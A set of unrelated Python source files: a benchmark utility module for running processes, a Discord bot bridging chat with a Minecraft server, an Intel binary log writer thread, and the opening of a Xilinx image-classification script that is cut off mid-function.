def args_with_cmd(a: ExecArgs, cmd: Sequence[str]) -> ExecArgs:
# Note: replace is not type-safe, so putting this near the definition of cmd
return replace(a, cmd=cmd)
AnyPopen = Union["Popen[str]", "Popen[bytes]"]
def is_process_alive(process: AnyPopen) -> bool:
return process.poll() is None
class ExecError(Exception):
pass
def _call_and_allow_interrupts(args: ExecArgs) -> timedelta:
start_time_seconds = time()
process = Popen(
args.cmd,
cwd=args.cwd,
env=args.env,
stdout=DEVNULL if args.quiet_stdout else None,
stderr=DEVNULL if args.quiet_stderr else None,
)
def handler(sig: int, _: Any) -> None: # TODO: `_: FrameType`
process.send_signal(sig)
raise KeyboardInterrupt
signal(SIGINT, handler)
exit_code = process.wait()
if exit_code != 0:
quiet_warning = " (Try running without 'quiet_stderr')" if args.quiet_stderr else ""
raise ExecError(f"Process {args.cmd} failed with exit code {exit_code}{quiet_warning}")
return timedelta(seconds=time() - start_time_seconds)
def exec_cmd(args: ExecArgs) -> timedelta:
args.print()
return _call_and_allow_interrupts(args)
@with_slots
@dataclass(frozen=True)
class BenchmarkRunErrorInfo:
name: str
iteration_num: int
message: str
trace: List[str]
def print(self) -> None:
print(
f"- Benchmark: '{self.name}' -\n"
f"Iteration: {self.iteration_num}\n"
f"Error Message: {self.message}\n"
f"\nStack Trace:\n{self.__rebuild_trace()}\n"
)
def __rebuild_trace(self) -> str:
return "".join(self.trace)
@with_slots
@dataclass(frozen=True)
class ConfigRunErrorInfo:
name: str
benchmarks_run: BenchmarkErrorList
def print(self) -> None:
print(f"=== Configuration '{self.name}' ===\n")
for bench in self.benchmarks_run:
bench.print()
def add_benchmark(self, new_bench: BenchmarkRunErrorInfo) -> None:
self.benchmarks_run.append(new_bench)
@with_slots
@dataclass(frozen=True)
class CoreRunErrorInfo:
name: str
configs_run: ConfigurationErrorMap
def print(self) -> None:
print(f"===== Core '{self.name}' =====\n")
for config in self.configs_run.values():
config.print()
def add_config(self, new_config: ConfigRunErrorInfo) -> None:
add(self.configs_run, new_config.name, new_config)
@with_slots
@dataclass(frozen=True)
class ExecutableRunErrorInfo:
name: str
coreclrs_run: CoreErrorMap
def print(self) -> None:
print(f"======= Executable '{self.name}' =======\n")
for coreclr in self.coreclrs_run.values():
coreclr.print()
def add_coreclr(self, new_coreclr: CoreRunErrorInfo) -> None:
add(self.coreclrs_run, new_coreclr.name, new_coreclr)
RunErrorMap = Dict[str, ExecutableRunErrorInfo]
CoreErrorMap = Dict[str, CoreRunErrorInfo]
ConfigurationErrorMap = Dict[str, ConfigRunErrorInfo]
BenchmarkErrorList = List[BenchmarkRunErrorInfo]
def add_new_error(
run_errors: RunErrorMap,
exec_name: str,
core_name: str,
config_name: str,
bench_name: str,
iteration_num: int,
message: str,
trace: List[str],
) -> None:
if exec_name not in run_errors:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
config_dict = {config_name: ConfigRunErrorInfo(config_name, bench_list)}
coreclr_dict = {core_name: CoreRunErrorInfo(core_name, config_dict)}
add(run_errors, exec_name, ExecutableRunErrorInfo(exec_name, coreclr_dict))
else:
exec_info = run_errors[exec_name]
if core_name not in exec_info.coreclrs_run:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
config_dict = {config_name: ConfigRunErrorInfo(config_name, bench_list)}
exec_info.add_coreclr(CoreRunErrorInfo(core_name, config_dict))
else:
core_info = exec_info.coreclrs_run[core_name]
if config_name not in core_info.configs_run:
bench_list = [BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)]
core_info.add_config(ConfigRunErrorInfo(config_name, bench_list))
else:
config_info = core_info.configs_run[config_name]
config_info.add_benchmark(
BenchmarkRunErrorInfo(bench_name, iteration_num, message, trace)
)
@with_slots
@dataclass(frozen=True)
class WaitOnProcessResult:
stdout: str
# None if timed out
time_taken: Optional[timedelta]
def exec_start(args: ExecArgs, pipe_stdout: bool, pipe_stdin: bool = False) -> Popen[str]:
args.print()
assert not (args.quiet_stdout and pipe_stdout)
return Popen(
args.cmd,
env=args.env,
cwd=None if args.cwd is None else str(args.cwd),
stdin=PIPE if pipe_stdin else None,
stdout=DEVNULL if args.quiet_stdout else PIPE if pipe_stdout else None,
text=True,
)
def wait_on_process_with_timeout(
process: Popen[str], start_time_seconds: float, timeout_seconds: float
) -> WaitOnProcessResult:
assert is_process_alive(process)
done = Event()
killed = False
def process_kill_function() -> None:
nonlocal killed
is_done = done.wait(timeout=timeout_seconds)
if not is_done and is_process_alive(process):
print(f"Process timed out after {timeout_seconds} seconds! Sending SIGINT")
# process.send_signal(SIGINT) # This causes ValueError: Unsupported signal: 2
kill_process(process, time_allowed_seconds=1)
killed = True
process_killer = Thread(target=process_kill_function)
process_killer.start()
stdout, stderr = process.communicate()
assert stderr is None
returncode = process.wait()
end_time_seconds = time()
# If the process exited normally early, process_kill_function can exit.
# (If it was killed, this will have no effect)
done.set()
process_killer.join()
assert returncode == process.returncode
assert killed or process.returncode == 0, f"Process failed with code {process.returncode}"
return WaitOnProcessResult(
stdout=stdout,
time_taken=None if killed else timedelta(seconds=(end_time_seconds - start_time_seconds)),
)
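# Ask the process to stop with SIGINT first; escalate to a hard kill() if it has not
# exited within time_allowed_seconds.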
def kill_process(process: AnyPopen, time_allowed_seconds: float) -> None:
assert is_process_alive(process)
kill(process.pid, SIGINT)
start_time_seconds = time()
while is_process_alive(process):
sleep(1)
if (time() - start_time_seconds) > time_allowed_seconds:
print(
f"Process '{check_cast(str, process.args)}' refused to shut down normally. "
+ "Trying again without asking nicely."
)
process.kill()
break
assert not is_process_alive(process)
class ExecutableNotFoundException(Exception):
def __init__(self, path: Path):
self.path = path
super().__init__(f"Cannot find {path}")
@with_slots
@dataclass(frozen=True)
class OutputAndExitCode:
stdout: str
exit_code: int
def exec_and_get_output_and_exit_code(args: ExecArgs) -> OutputAndExitCode:
args.print()
# These arguments don't apply here, should have their default values
assert args.quiet_stdout is False and args.quiet_stderr is False
try:
r = run(args.cmd, stdout=PIPE, cwd=args.cwd, env=args.env, check=False)
except FileNotFoundError:
raise ExecutableNotFoundException(Path(args.cmd[0])) from None
except NotADirectoryError:
raise Exception(f"Invalid cwd: {args.cwd}") from None
return OutputAndExitCode(decode_stdout(r.stdout), r.returncode)
def exec_and_get_output(args: ExecArgs, expect_exit_code: Optional[int] = None) -> str:
expected_exit_code = option_or(expect_exit_code, 0)
res = exec_and_get_output_and_exit_code(args)
assert (
res.exit_code == expected_exit_code
), f"Returned with code {res.exit_code}, expected {expected_exit_code}"
return res.stdout
@with_slots
@dataclass(frozen=True)
class ProcessResult:
exit_code: int
stdout: str
stderr: str
def exec_and_get_result(args: ExecArgs) -> ProcessResult:
args.print()
# These arguments don't apply here, should have their default values
assert args.quiet_stdout is False and args.quiet_stderr is False
try:
r = run(args.cmd, stdout=PIPE, stderr=PIPE, cwd=args.cwd, env=args.env, check=False)
except FileNotFoundError:
raise Exception(f"Cannot find {args.cmd[0]}") from None
return ProcessResult(
exit_code=r.returncode, stdout=decode_stdout(r.stdout), stderr=decode_stdout(r.stderr)
)
def decode_stdout(stdout: bytes) -> str:
# Microsoft trademark confuses python
stdout = stdout.replace(b"\xae", b"")
return stdout.decode("utf-8").strip().replace("\r", "")
def exec_and_expect_output(args: ExecArgs, expected_output: str, err: str) -> None:
output = exec_and_get_output(args)
if output != expected_output:
print("actual:", repr(output))
print("expect:", repr(expected_output))
raise Exception(err)
_BYTES_PER_KB: int = 2 ** 10
_BYTES_PER_MB: int = 2 ** 20
_BYTES_PER_GB: int = 2 ** 30
def bytes_to_kb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_KB
def bytes_to_mb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_MB
def bytes_to_gb(n_bytes: Union[int, float]) -> float:
return n_bytes / _BYTES_PER_GB
def kb_to_bytes(kb: float) -> int:
return round(kb * _BYTES_PER_KB)
def mb_to_bytes(mb: float) -> int:
return round(mb * _BYTES_PER_MB)
def gb_to_bytes(gb: float) -> int:
return round(gb * _BYTES_PER_GB)
def kb_to_mb(kb: float) -> float:
return bytes_to_mb(kb_to_bytes(kb))
def mb_to_kb(mb: float) -> float:
return bytes_to_kb(mb_to_bytes(mb))
def mb_to_gb(mb: float) -> float:
return bytes_to_gb(mb_to_bytes(mb))
def gb_to_kb(gb: float) -> float:
return bytes_to_kb(gb_to_bytes(gb))
def gb_to_mb(gb: float) -> float:
return bytes_to_mb(gb_to_bytes(gb))
MSECS_PER_SECOND = 1000
USECS_PER_SECOND = 1_000_000
def show_size_bytes(n_bytes: float) -> str:
return show_in_units(
n_bytes,
(Unit(_BYTES_PER_GB, "GB"), Unit(_BYTES_PER_MB, "MB"), Unit(_BYTES_PER_KB, "KB")),
Unit(1, "bytes"),
)
@with_slots
@dataclass(frozen=True)
class Unit:
amount: float
name: str
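# Pick the largest unit that the amount fills at least once, falling back to the
# base unit; e.g. show_size_bytes(3 * 1024 ** 2) == "3.00 MB".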
def show_in_units(amount: float, units: Sequence[Unit], base_unit: Unit) -> str:
# Find a unit where this is >= 1 of it
unit = option_or(find(lambda u: abs(amount) >= u.amount, units), base_unit)
amount_in_units = (
str(amount) if unit.amount == 1 and amount % 1 == 0 else "%.2f" % (amount / unit.amount)
)
return amount_in_units + f" {unit.name}"
def seconds_to_msec(seconds: float) -> float:
return seconds * MSECS_PER_SECOND
def seconds_to_usec(seconds: float) -> float:
return seconds * USECS_PER_SECOND
def msec_to_seconds(msec: float) -> float:
return msec / MSECS_PER_SECOND
def mhz_to_ghz(mhz: float) -> float:
return mhz / 1000
# Python's os.walk won't work, because it takes Strings and not paths.
# Unfortunately `Path(str(path))` isn't the identity if path is `//machine/`. (Python bug?)
def walk_files_recursive(path: Path, filter_dir: Callable[[Path], bool]) -> Iterable[Path]:
for sub in path.iterdir():
if sub.is_dir():
if filter_dir(sub):
for x in walk_files_recursive(sub, filter_dir):
yield x
else:
yield sub
def get_hostname() -> str:
return node()
# TODO:MOVE
def assert_admin() -> None:
if not is_admin():
raise Exception(
"PerfView requires you to be an administrator"
if os_is_windows()
else "cgcreate requires you to be a super user"
)
def is_admin() -> bool:
if os_is_windows():
# Do this import lazily as it is only available on Windows
from win32com.shell.shell import IsUserAnAdmin # pylint:disable=import-outside-toplevel
return IsUserAnAdmin()
else:
# Importing it this way since geteuid doesn't exist in windows and mypy complains there
geteuid = cast(Callable[[], int], getattr(os, "geteuid"))
return geteuid() == 0
def get_extension(path: Path) -> str:
return splitext(path.name)[1]
def add_extension(p: Path, ext: str) -> Path:
return p.parent / f"{p.name}.{ext}"
def remove_extension(p: Path) -> Path:
return p.parent / splitext(p.name)[0]
def change_extension(p: Path, ext: str) -> Path:
return add_extension(remove_extension(p), ext)
def get_or_did_you_mean(mapping: Mapping[str, V], key: str, name: str) -> V:
try:
return mapping[key]
except KeyError:
raise Exception(did_you_mean(tuple(mapping.keys()), key, name)) from None
def did_you_mean(
choices: Iterable[str], choice: str, name: str, show_choice: Callable[[str], str] = identity
) -> str:
assert choice not in choices
# Mypy has the return type of get_close_matches wrong?
close = check_cast(Sequence[str], get_close_matches(choice, choices)) # type: ignore
if is_empty(close):
choices = tuple(choices)
if len(choices) < 20:
return f"Bad {name} {show_choice(choice)}. Available: {tuple(choices)}"
else:
return f"Bad {name} {show_choice(choice)}."
elif len(close) == 1:
return f"Bad {name} {show_choice(choice)}. Did you mean {show_choice(close[0])}?"
else:
close_str = "\n".join(tuple(show_choice(c) for c in close))
return f"Bad {name} {show_choice(choice)}. Did you mean one of:\n{close_str}"
def hex_no_0x(i: int) -> str:
return remove_str_start(hex(i), "0x")
def try_parse_single_tag_from_xml_document(path: Path, tag_name: str) -> Optional[str]:
assert tag_name.startswith("{"), "Should start with schema"
root = parse_xml(str(path)).getroot()
tags = tuple(_iter_tag_recursive(root, tag_name))
if is_empty(tags):
return None
else:
assert len(tags) == 1 # Should only be specified once
tag = tags[0]
return tag.text
def _iter_tag_recursive(e: Element, tag_name: str) -> Iterable[Element]:
for child in e:
if child.tag == tag_name:
yield child
else:
yield from _iter_tag_recursive(child, tag_name)
# Note: WeakKeyDictionary does not seem to work on CLR types. So using this hack instead.
def lazy_property(obj: T, f: Callable[[T], U], name: Optional[str] = None) -> U:
if name is None:
# Mypy expects f to be a "FunctionType", but I don't know how to import that
name = f"{getfile(cast(Any, f))}/{f.__name__}"
res: Optional[U] = getattr(obj, name, None)
if res is None:
res = f(obj)
assert res is not None
setattr(obj, name, res)
return res
def opt_max(i: Iterable[float]) -> Optional[float]:
try:
return max(i)
except ValueError:
return None
def opt_median(i: Iterable[float]) -> Optional[float]:
try:
return median(i)
except StatisticsError:
return None
# numpy has problems on ARM, so using this instead.
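# Percentile via linear interpolation between the two nearest ranks,
# e.g. get_percentile([1, 2, 3, 4], 50) == 2.5.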
def get_percentile(values: Sequence[float], percent: float) -> float:
assert not is_empty(values)
assert 0.0 <= percent <= 100.0
sorted_values = sorted(values)
fraction = percent / 100.0
index_and_fraction = (len(values) - 1) * fraction
prev_index = floor(index_and_fraction)
next_index = ceil(index_and_fraction)
# The closer we are to 'next_index', the more 'next' should matter
next_factor = index_and_fraction - prev_index
prev_factor = 1.0 - next_factor
return sorted_values[prev_index] * prev_factor + sorted_values[next_index] * next_factor
def get_95th_percentile(values: Sequence[float]) -> Result[str, float]:
return Err("<no values>") if is_empty(values) else Ok(get_percentile(values, 95))
def update_file(path: Path, text: str) -> None:
if (not path.exists()) or path.read_text(encoding="utf-8") != text:
print(f"Updating {path}")
path.write_text(text, encoding="utf-8")
# When we run a test with 'sudo', we need to make sure other users can access the file
def give_user_permissions(file: Path) -> None:
flags = S_IREAD | S_IWRITE | S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH | S_IWOTH
file.chmod(flags)
def check_no_processes(names: Sequence[str]) -> None:
assert all(name.islower() for name in names)
for proc in process_iter():
for name in names:
suggestion = {
OS.posix: f"pkill -f {name}",
OS.windows: f'Get-Process | Where-Object {{$_.Name -like "{name}"}} | Stop-Process',
}[get_os()]
assert name not in proc.name().lower(), (
f"'{name}' is already running\n" + f"Try: `{suggestion}`"
)
def get_command_line() -> str:
return f"> py {' '.join(argv)}"
|
opurtbot_foreign.py
|
import discord
from discord.ext import tasks, commands
import asyncio
import threading
import subprocess
import time
from queue import Queue, Empty
from threading import Thread
from requests import get
import os
import re
chat_reg = re.compile("<[^ ]+>")
q = Queue()
inq = Queue() # queue for discord -> minecraft communication
outq = Queue() # queue for minecraft -> discord communication
active_players = set()
def enqueue(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
def run_minecraft(command):
p = subprocess.Popen(["java", "-jar","-Xmx11000M", "-Xms11000M", "forge-1.16.1-32.0.107.jar", "nogui"],
stdout=subprocess.PIPE,
stdin = subprocess.PIPE,
stderr=subprocess.STDOUT,
)
t = Thread(target = enqueue, args = (p.stdout, q))
t.daemon = True
t.start()
cc = 0
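    # Pump loop: push queued Discord messages into the server's stdin as tellraw
    # commands, and parse server stdout for joins/leaves/chat to relay back via outq.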
while True:
cc += 1
while not inq.empty():
# push commands into the subprocess
item = inq.get()
print(item)
if item['task'] == 'message-minecraft':
print(item)
command = 'tellraw @a {"text": "[%s] %s", "color" : "green"}' % (item['user'], item['message'].replace('\n', ' | '))
p.stdin.write((command + "\n").encode())
p.stdin.flush()
try:
line = q.get(timeout = 0.5)
if line == 'quit':
print("quit the minecraft thread")
                p.kill()
                break
line = line.decode()
print(line)
if "joined the game" in line:
end_idx = line.index(" joined the game")
start_idx = line.rindex(' ', 0, end_idx)
name = line[start_idx + 1: end_idx]
active_players.add(name)
outq.put({
"task" : "message-discord-joinleave",
"user" : name,
"message" : "%s joined the game 💎" % name
})
elif "left the game" in line:
end_idx = line.index(" left the game")
start_idx = line.rindex(' ', 0, end_idx)
name = line[start_idx + 1: end_idx]
active_players.remove(name)
outq.put({
"task" : "message-discord-joinleave",
"user" : name,
"message" : "%s left the game 🏃" % name
})
match = chat_reg.search(line)
if match:
print("found match!")
span = match.span()
user = line[span[0] + 1 : span[1] - 1]
message = line[span[1] + 1 : -2]
outq.put({
"task" : "message-discord",
"user" : user,
"message" : message
})
except:
if cc % 10 == 0:
print(".")
return
class SpinupThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
def run(self):
client = Spinup()
client.run(os.environ['DISCORD_TOKEN'])
class ServerThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
def run(self):
run_minecraft([])
class Spinup(discord.Client):
    def __init__(self, sock=None):  # sock is optional; only !spindown uses it via sock.emit('quit')
super().__init__()
self.sock = sock
self.voting = False
self.voted = set()
self.running = False
self.upsince = 0
self.voteStarted = 0
self.voteChannel = None
self.locked = False
self.dimensional_rift = None
self.ip = None
self.vc = None
async def on_ready(self):
print('Logged on as {0}!'.format(self.user))
self.dimensional_rift = discord.utils.get(self.get_all_channels(), name = "dimensional-rift")
self.server_status = discord.utils.get(self.get_all_channels(), name = "server-status")
async def on_message(self, message):
print(message.author.id, message.channel.name, message.channel.id)
if message.channel.name == 'dimensional-rift':
# this is a message sent from minecraft
if (message.author == client.user) and message.content.startswith("```"):
return
inq.put({
"task" : 'message-minecraft',
"message" : message.content,
"user" : message.author.nick
})
if message.content.startswith('#purge'):
summary = {}
num = int(message.content.split(" ")[1])
if num > 10:
num = 10
num += 1
if 'admin' in [r.name for r in message.author.roles]:
history = await message.channel.history(limit = 100).flatten()
for m in history[:num]:
if m.author.display_name not in summary:
summary[m.author.display_name] = 1
else:
summary[m.author.display_name] += 1
summary_msg = ">>> "
for n in summary:
summary_msg += n + ": " + str(summary[n]) + "\n"
await message.channel.delete_messages(history[:num])
await message.channel.send(summary_msg)
# TODO: Put these in a dictionary or smth
if message.content == "!clipthat":
print(message.author.voice.channel)
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./wardell_clipthat.mp3")
)
while self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == "!yessir":
print(message.author.voice.channel)
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./wardell_yessir.mp3")
)
while self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == "!yooo":
print(message.author.voice.channel)
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./csgo_niceknife.mp3")
)
while self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == '!bwaaa':
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./victory.mp3")
)
while self.vc and self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == '!bwaa':
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./imposter_victory.mp3")
)
while self.vc and self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
if message.content == '!delib':
try:
self.vc = await message.author.voice.channel.connect()
self.vc.play(
discord.FFmpegPCMAudio(executable = "C:/ffmpeg/bin/ffmpeg.exe", source = "./naruto_deliberation.mp3")
)
while self.vc and self.vc.is_playing():
await asyncio.sleep(.1)
await self.vc.disconnect()
except discord.errors.ClientException:
await message.channel.send(
"opurtbot is already playing a clip"
)
elif message.content == '!!delib':
if self.vc:
await self.vc.disconnect()
self.vc = None
if message.content.startswith("!spinup"):
if self.voting:
await message.channel.send("you mf clown there's already an active vote")
elif self.running:
await message.channel.send("the server is already up u fool")
elif self.locked:
await message.channel.send("the server is locked! nathan's probably playing valorant...")
else:
if (message.author.id == 279456734773510145) and not message.content.endswith("nosudo"):
await self.spinup(message)
else:
await message.channel.send("starting vote, need 5 people to confirm. you have 3 MINUTES to vote [type `!yes` to vote, `!no` to cancel your existing vote]")
self.voteChannel = message.channel
self.voteStarted = time.time()
self.voting = True
self.voted = set()
elif message.content.startswith("!whois"):
if len(active_players):
res = "players currently on: \n```"
for p in active_players:
res += " - " + p + "\n"
await message.channel.send(res + "```")
else:
await message.channel.send("no one is on, hop in!")
elif message.content.startswith("!lock"):
if (message.author.id == 279456734773510145):
await message.channel.send("the server is locked and cannot be spun up")
self.locked = True
if self.voting:
await message.channel.send("the active vote has been cancelled")
self.voting = False
self.voted = set()
elif message.content.startswith("!unlock"):
if (message.author.id == 279456734773510145):
await message.channel.send("the server is unlocked and can be spun up")
self.locked = False
elif message.content.startswith("!help"):
await message.channel.send("""
`!spinup` - starts a vote to spin up the minecraft server, type `!yes` to vote, `!no` to cancel
`!spindown` - spins down the minecraft server, there is NO voting process
`!ip` - returns the IP address of the server
`!isup` - checks if the server is currently up/starting up
`!uptime` - returns the uptime of the server in seconds
""")
elif message.content.startswith("!yes"):
if message.author not in self.voted and self.voting:
self.voted.add(message.author)
await message.channel.send("%s out of 5 votes recorded" % len(self.voted))
if len(self.voted) == 5:
# spin up the minecraft server
await self.spinup(message)
elif message.content.startswith("!no"):
if message.author in self.voted and self.voting:
self.voted.remove(message.author)
await message.channel.send("%s out of 5 votes recorded" % len(self.voted))
elif message.content.startswith("!spindown"):
await message.channel.send("spinning down the minecraft server")
self.sock.emit('quit')
self.running = False
elif message.content.startswith("!isup"):
if self.running:
await message.channel.send("the server IS up")
else:
await message.channel.send("the server is NOT up")
elif message.content.startswith("!uptime"):
if self.running:
await message.channel.send("the server has been up for %s seconds" % ((time.time() - self.upsince)))
else:
await message.channel.send("the server is not currently up")
elif message.content.startswith("!ip"):
self.ip = get('https://api.ipify.org').text
await message.channel.send("`%s:25565`" % self.ip)
async def spinup(self, message):
self.ip = get('https://api.ipify.org').text
await message.channel.send("vote succeeded, spinning up minecraft @ %s:25565" % self.ip)
self.voting = False
self.voted = set()
if (not self.running):
m = ServerThread()
m.start()
self.running = True
self.upsince = time.time()
client = Spinup()
async def check_messages(ctx):
last_message = None
prev_topic = ""
while True:
if ctx.dimensional_rift and ctx.server_status:
if not last_message:
last_message = ctx.server_status.last_message_id
# set the topic of the chat
statuses = []
statuses.append("ON @ %s" % ctx.ip if ctx.running else "OFF")
statuses.append("LOCKED" if ctx.locked else "UNLOCKED")
if ctx.voting:
statuses.append("VOTING")
topic = "SERVER: "
for status in statuses:
topic += status + ", "
topic = topic[:-2]
if len(active_players) and ctx.running:
topic += " | "
for player in active_players:
topic += player + ", "
topic = topic[:-2]
elif len(active_players) == 0 and ctx.running:
topic += " | no one is on, hop on!"
if topic != prev_topic:
print("EDITING TOPIC: %s, %s" % (prev_topic, topic))
# delete the last message
if last_message:
try:
if type(last_message) == int:
msg = await ctx.server_status.fetch_message(last_message)
await msg.delete()
else:
await last_message.delete()
except Exception as e:
print(e)
last_message = await ctx.server_status.send(topic)
prev_topic = topic
if (time.time() - ctx.voteStarted) > 180 and ctx.voting:
ctx.voting = False
ctx.voted = set()
await ctx.voteChannel.send("sorry! the vote has ended, type `!spinup` to start another vote")
elif int(time.time() - ctx.voteStarted) == 120 and ctx.voting:
ctx.voteStarted -= 1 # janky workaround: we only want this reminder sent once, so we nudge voteStarted back by one second; the elapsed-time equality above then skips past 120 on the next 0.1 second poll of check_messages, ensuring the message is sent only once
await ctx.voteChannel.send("the vote will end in 1 MINUTE")
elif int(time.time() - ctx.voteStarted) == 60 and ctx.voting:
ctx.voteStarted -= 1
await ctx.voteChannel.send("the vote will end in 2 MINUTES")
while not outq.empty():
item = outq.get()
if item['task'] == 'message-discord':
#channel = discord.utils.get(ctx.get_all_channels(), name = "dimensional-rift")
#print(channel)
if not item['message'].endswith("Disconnected"):
await ctx.dimensional_rift.send("```diff\n+ <%s> %s```" % (item['user'], item['message']))
elif item['task'] == 'message-discord-joinleave':
user = item['user']
message = item['message']
await ctx.dimensional_rift.send(message)
await asyncio.sleep(0.1)
client.loop.create_task(check_messages(client))
client.run(os.environ['DISCORD_TOKEN'])
|
MptaWriterThread.py
|
"""
Copyright (C) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
import Queue
import threading
BIN_EXT = '.bin'
class MptaWriterThread(object):
def __init__(self):
# Internal buffer
self.__queue = Queue.Queue()
# Writer thread stop condition
self._stop_event = threading.Event()
self.__writer_thread = None
self.__bin_filename = ''
self.__file = None
self.__filename = None
self.__start_writing = False
def set_output_file(self, filename):
self.__filename = filename
return
def start(self):
self._stop_event.clear()
self.__writer_thread = threading.Thread(target=self.__run)
self.__writer_thread.name = "MptaWriterThread"
self.__writer_thread.daemon = True
self.__writer_thread.start()
def stop(self):
self._stop_event.set()
if self.__writer_thread is not None:
try:
self.__writer_thread.join(30)
except (KeyboardInterrupt, SystemExit):
raise
except BaseException: # pylint: disable=W0703
pass
finally:
del self.__writer_thread
self.__writer_thread = None
return
def push(self, line):
self.__queue.put_nowait(line)
def __run(self):
# get output file name
self.__bin_filename = self.__filename + BIN_EXT
try:
self.__file = open(self.__bin_filename, 'wb')
except (KeyboardInterrupt, SystemExit):
raise
except BaseException:
# raise MptaLoggerThreadError(-1, "MptaLoggerThread file creation failed")
pass
self.__start_writing = True
while not self._stop_event.is_set():
while not self.__queue.empty():
line = self.__queue.get_nowait()
if len(line) > 0 and self.__file is not None:
self.__file.write(line)
self.__file.flush()
self._stop_event.wait(1)
# close log file
if self.__file is not None:
self.__file.flush()
self.__file.close()
self.__file = None
return
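# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal driving sequence for this writer, assuming some producer thread
# supplies binary records; the filename and payload below are placeholders.
#
#   writer = MptaWriterThread()
#   writer.set_output_file('capture')    # '.bin' is appended inside __run()
#   writer.start()
#   writer.push(b'\x00\x01\x02')         # queued; the worker thread writes and flushes it
#   writer.stop()                        # sets the stop event and joins the worker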
|
classification.py
|
'''
Copyright 2019 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
# code inspired by VAI 1.3 VART inception_v1_mt_py
from ctypes import *
from typing import List
import cv2
import numpy as np
import vart
import xir
import pathlib
import os
import math
import threading
import time
import sys
import argparse
#######################################################################################################
#Size of images
IMAGE_WIDTH = 256
IMAGE_HEIGHT = 256
#number of classes
NUM_CLASSES = 2
classes = ["cat", "dog"]
#######################################################################################################
_R_MEAN = 124.45967
_G_MEAN = 116.04212
_B_MEAN = 106.40268
MEANS = [_B_MEAN,_G_MEAN,_R_MEAN]
def resize_shortest_edge(image, size):
H, W = image.shape[:2]
if H >= W:
nW = size
nH = int(float(H)/W * size)
else:
nH = size
nW = int(float(W)/H * size)
return cv2.resize(image,(nW,nH))
def mean_image_subtraction(image, means):
B, G, R = cv2.split(image)
B = B - means[0]
G = G - means[1]
R = R - means[2]
image = cv2.merge([B, G, R])
return image
def BGR2RGB(image):
B, G, R = cv2.split(image)
image = cv2.merge([R, G, B])
return image
def central_crop(image, crop_height, crop_width):
image_height = image.shape[0]
image_width = image.shape[1]
offset_height = (image_height - crop_height) // 2
offset_width = (image_width - crop_width) // 2
return image[offset_height:offset_height + crop_height, offset_width:
offset_width + crop_width, :]
def preprocess_fn(image_path, crop_height = 256, crop_width = 256):
image = cv2.imread(image_path)
#image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
#image = BGR2RGB(image)
#image = resize_shortest_edge(image, 256)
#image = central_crop(image, crop_height, crop_width)
image = mean_image_subtraction(image, MEANS)
return image
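# Illustrative call (added comment; the filename is hypothetical): the accuracy
# check in app() takes the text before the first '.' in each file name as the
# ground-truth label, so images would typically be named like "cat.0.jpg":
#   image = preprocess_fn("./test_images/cat.0.jpg")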
#######################################################################################################
def get_script_directory():
path = os.getcwd()
return path
def CPUCalcSoftmax(data,size):
'''
Calculate softmax
data: data to be calculated
size: data size
return: softmax result
'''
sum=0.0
result = [0 for i in range(size)]
for i in range(size):
result[i] = math.exp(data[i])
sum +=result[i]
for i in range(size):
result[i] /=sum
return result
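# Worked example (added for illustration): equal inputs give a uniform result,
# e.g. CPUCalcSoftmax([0.0, 0.0], 2) returns [0.5, 0.5], and the outputs always
# sum to 1.0.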
def TopK(datain,size,filePath):
'''
Get top-k results according to their probabilities
datain: softmax result data
size: data size
filePath: path of the file that records the class information
'''
cnt=[i for i in range(size) ]
pair=zip(datain,cnt)
pair=sorted(pair,reverse=True)
softmax_new,cnt_new=zip(*pair)
fp=open(filePath, "r")
data1=fp.readlines()
fp.close()
for i in range(2):
flag=0
for line in data1:
if flag==cnt_new[i]:
